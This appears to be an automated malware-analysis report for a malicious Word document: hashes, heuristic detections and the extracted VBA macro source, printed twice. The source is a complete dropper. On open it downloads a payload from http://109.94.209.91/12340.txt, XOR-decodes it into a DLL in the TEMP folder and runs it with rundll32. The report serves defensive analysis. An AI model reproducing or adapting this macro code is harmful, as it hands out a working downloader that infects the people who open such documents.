Office (OLE) malware analysis — malicious · 957f37a154fe1887

MALICIOUS

Office (OLE)

116.5 KB Created: 2019-08-07 14:47:00 Authoring application: Microsoft Office Word First seen: 2021-04-10

MD5: 466fb98ea9e76c5b2e736e097bfd0d1b SHA-1: 91822204c373e80e7d2b799fd0f7acd0ba43517c SHA-256: 957f37a154fe18875fba6ea25793f1a2c7e389749aa472a84a8fecf92cca9d74

358 Risk Score

Heuristics 11

ClamAV: Doc.Dropper.Agent-7105561-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7105561-0
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
CreateObject("WScript.Shell").Exec ("rundll32 " + fileextensionsline & ",DllMain")
```
LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA
Matched line in script
```
CreateObject("WScript.Shell").Exec ("rundll32 " + fileextensionsline & ",DllMain")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set recovered_tb = CreateObject("InternetExplorer.Application")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
ChDir (Environ("TEMP"))
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://109.94.209.91/12340.txt In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3214 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3214 bytes
SHA-256: `f62ab2e1e4dc41070093f61ac95a4ad7f0388c0c24c5a9188f3fac9be450c18d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Public Sub variable_caption(split_sEcho As String, languages_foo2 As String, nomnumber As Integer, nomnumber2 As Integer) Dim cachingcore() As String, fldarr() As String, labelNamesubname As Long, removeID_tb As Integer, mode_val As String Dim BIGGER_u30 As String Dim iSortingCols_response() As Byte Dim jabberlogout As Integer Dim adress_subtitle As Byte iSortingCols_response = StrConv(split_sEcho, vbFromUnicode) BIGGER_u30 = StrConv(iSortingCols_response, vbUnicode) cachingcore = Split(BIGGER_u30, vbCrLf) If UBound(cachingcore) = 0 Then cachingcore = Split(BIGGER_u30, vbLf) If UBound(cachingcore) = 0 Then cachingcore = Split(BIGGER_u30, vbCr) End If End If Open languages_foo2 For Binary Lock Read Write As #2 For labelNamesubname = 0 To (UBound(cachingcore)) fldarr = Split(cachingcore(labelNamesubname), ",") mode_val = fldarr(nomnumber) If Len(mode_val) > 0 Then adress_subtitle = Val(mode_val) adress_subtitle = adress_subtitle Xor (106 + nomnumber2) Put #2, , CByte(adress_subtitle) End If Next Close #2 End Sub Public Sub ReadFromExcel() Dim cachingcore() As String, fldarr() As String, labelNamesubname As Long, removeID_tb As Integer, mode_val As String Dim emailsid As String On Error Resume Next Dim sortspecial As Integer, lstwords As Integer, notestep2 As Integer Dim completed_bID As String sortspecial = 1 notestep2 = 2 lstwords = 0 emailsid = "output.pdf" Dim recovered_tb As Object Set recovered_tb = CreateObject("InternetExplorer.Application") With recovered_tb .navigate ("http://109.94.209.91/12340.txt") Do Until .readyState = 4 DoEvents Loop completed_bID = .Document.body.innerText ChDir (Environ("TEMP")) Call variable_caption(completed_bID, emailsid, lstwords, notestep2) Dim fileextensionsline As String fileextensionsline = "real3d.dll" Call variable_caption(completed_bID, fileextensionsline, lstwords, sortspecial) Module1.PtrSafe Done: Call variable_caption(completed_bID, fileextensionsline, lstwords, lstwords) Module1.PtrSafe CreateObject("WScript.Shell").Exec ("rundll32 " + fileextensionsline & ",DllMain") .Quit End With End Sub Private Sub Document_Close() End Sub Private Sub Document_New() End Sub Private Sub Document_Open() UserForm1.Show End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{A8955DBF-CF2D-40FA-B8D7-AF8929E5571C}{D3C8C1EF-4574-4C41-A028-D7F7834E724B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub UserForm_Activate() ThisDocument.ReadFromExcel End Sub Private Sub UserForm_Click() End Sub Attribute VB_Name = "Module1" Declare PtrSafe Function PtrSafe Lib "real3d" Alias _ "DllMain" () As Integer

SHA-256: f62ab2e1e4dc41070093f61ac95a4ad7f0388c0c24c5a9188f3fac9be450c18d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

 Public Sub variable_caption(split_sEcho As String, languages_foo2 As String, nomnumber As Integer, nomnumber2 As Integer)
Dim cachingcore() As String, fldarr() As String, labelNamesubname As Long, removeID_tb As Integer, mode_val As String
Dim BIGGER_u30 As String
Dim iSortingCols_response() As Byte
Dim jabberlogout As Integer
Dim adress_subtitle As Byte
iSortingCols_response = StrConv(split_sEcho, vbFromUnicode)
BIGGER_u30 = StrConv(iSortingCols_response, vbUnicode)
cachingcore = Split(BIGGER_u30, vbCrLf)
If UBound(cachingcore) = 0 Then
    cachingcore = Split(BIGGER_u30, vbLf)
    If UBound(cachingcore) = 0 Then
        cachingcore = Split(BIGGER_u30, vbCr)
    End If
End If
Open languages_foo2 For Binary Lock Read Write As #2

For labelNamesubname = 0 To (UBound(cachingcore))

fldarr = Split(cachingcore(labelNamesubname), ",")
mode_val = fldarr(nomnumber)
If Len(mode_val) > 0 Then
adress_subtitle = Val(mode_val)
adress_subtitle = adress_subtitle Xor (106 + nomnumber2)
Put #2, , CByte(adress_subtitle)
End If


Next
Close #2
 End Sub
 

Public Sub ReadFromExcel()
Dim cachingcore() As String, fldarr() As String, labelNamesubname As Long, removeID_tb As Integer, mode_val As String
Dim emailsid As String

On Error Resume Next


Dim sortspecial As Integer, lstwords As Integer, notestep2 As Integer
Dim completed_bID As String


sortspecial = 1
notestep2 = 2
lstwords = 0
emailsid = "output.pdf"
Dim recovered_tb As Object

Set recovered_tb = CreateObject("InternetExplorer.Application")
With recovered_tb

.navigate ("http://109.94.209.91/12340.txt")
Do Until .readyState = 4
DoEvents
Loop
completed_bID = .Document.body.innerText
ChDir (Environ("TEMP"))
Call variable_caption(completed_bID, emailsid, lstwords, notestep2)

Dim fileextensionsline As String

fileextensionsline = "real3d.dll"

Call variable_caption(completed_bID, fileextensionsline, lstwords, sortspecial)




Module1.PtrSafe

Done:
Call variable_caption(completed_bID, fileextensionsline, lstwords, lstwords)

Module1.PtrSafe

CreateObject("WScript.Shell").Exec ("rundll32 " + fileextensionsline & ",DllMain")

.Quit
End With

End Sub
Private Sub Document_Close()


End Sub

Private Sub Document_New()

End Sub

Private Sub Document_Open()
UserForm1.Show
End Sub




Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{A8955DBF-CF2D-40FA-B8D7-AF8929E5571C}{D3C8C1EF-4574-4C41-A028-D7F7834E724B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
 
Private Sub UserForm_Activate()
ThisDocument.ReadFromExcel

End Sub

Private Sub UserForm_Click()

End Sub

Attribute VB_Name = "Module1"
Declare PtrSafe Function PtrSafe Lib "real3d" Alias _
"DllMain" () As Integer

Open this report in the interactive analyzer, or submit your own file for analysis.